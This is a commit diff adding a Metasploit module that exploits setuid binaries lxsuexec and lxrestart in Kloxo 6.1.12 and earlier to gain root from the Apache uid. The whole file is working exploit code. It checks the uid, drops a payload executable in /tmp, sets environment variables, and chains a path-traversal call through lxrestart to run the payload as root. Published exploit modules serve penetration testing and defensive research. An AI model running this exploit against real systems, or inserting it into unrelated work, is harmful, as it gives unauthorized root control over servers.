Landing rapid7#1823 - Kloxo Local Privilege Escalation

Author: wchen-r7

modules/exploits/linux/local/kloxo_lxsuexec.rb

@@ -0,0 +1,111 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/exe'
+
+class Metasploit4 < Msf::Exploit::Local
+
+	include Msf::Exploit::EXE
+	include Msf::Post::File
+	include Msf::Post::Common
+	include Msf::Exploit::FileDropper
+
+	include Msf::Exploit::Local::Linux
+
+	def initialize(info={})
+		super(update_info(info, {
+			'Name'          => 'Kloxo Local Privilege Escalation',
+			'Description'   => %q{
+					Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as
+				lxsuexec and lxrestart, allow local privilege escalation to root from uid 48,
+				Apache by default on CentOS 5.8, the operating system supported by Kloxo.
+				This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'HTP', # Original PoC according to exploit-db
+					'juan vazquez' # Metasploit module
+				],
+			'Platform'      => [ 'linux' ],
+			'Arch'          => [ ARCH_X86 ],
+			'SessionTypes'  => [ 'shell' ],
+			'Payload'		=>
+				{
+					'Space'     => 8000,
+					'DisableNops' => true
+				},
+			'References'    =>
+				[
+					[ 'EDB', '25406' ],
+					[ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC
+				],
+			'Targets'       =>
+				[
+					[ 'Kloxo 6.1.12', {} ]
+				],
+			'DefaultOptions' =>
+				{
+					'PrependSetuid'    => true
+				},
+			'DefaultTarget' => 0,
+			'Privileged'     => true,
+			'DisclosureDate' => "Sep 18 2012"
+		}))
+	end
+
+	def exploit
+		# apache uid (48) is needed in order to abuse the setuid lxsuexec binary
+		# .text:0804869D                 call    _getuid
+		# .text:080486A2                 cmp     eax, 48
+		# .text:080486A5                 jz      short loc_80486B6 // uid == 48 (typically apache on CentOS)
+		# .text:080486A7                 mov     [ebp+var_A4], 0Ah
+		# .text:080486B1                 jmp     loc_8048B62 // finish if uid != 48
+		# .text:08048B62 loc_8048B62:                           ; CODE XREF: main+39j
+		#.text:08048B62                                         ; main+B0j
+		#.text:08048B62                 mov     eax, [ebp+var_A4]
+		#.text:08048B68                 add     esp, 0ECh
+		#.text:08048B6E                 pop     ecx
+		#.text:08048B6F                 pop     esi
+		#.text:08048B70                 pop     edi
+		#.text:08048B71                 pop     ebp
+		#.text:08048B72                 lea     esp, [ecx-4]
+		#.text:08048B75                 retn
+		#.text:08048B75 main            endp
+		print_status("Checking actual uid...")
+		id = cmd_exec("id -u")
+		if id != "48"
+			fail_with(Exploit::Failure::NoAccess, "You are uid #{id}, you must be uid 48(apache) to exploit this")
+		end
+
+		# Write msf payload to /tmp and give provide executable perms
+		pl = generate_payload_exe
+		payload_path = "/tmp/#{rand_text_alpha(4)}"
+		print_status("Writing payload executable (#{pl.length} bytes) to #{payload_path} ...")
+		write_file(payload_path, pl)
+		register_file_for_cleanup(payload_path)
+
+		# Profit
+		print_status("Exploiting...")
+		cmd_exec("chmod +x #{payload_path}")
+		cmd_exec("LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`")
+		cmd_exec("export MUID=$LXLABS")
+		cmd_exec("export GID=$LXLABS")
+		cmd_exec("export TARGET=/bin/sh")
+		cmd_exec("export CHECK_GID=0")
+		cmd_exec("export NON_RESIDENT=1")
+		helper_path = "/tmp/#{rand_text_alpha(4)}"
+		write_file(helper_path, "/usr/sbin/lxrestart '../../..#{payload_path} #'")
+		register_file_for_cleanup(helper_path)
+		cmd_exec("lxsuexec #{helper_path}")
+	end
+
+end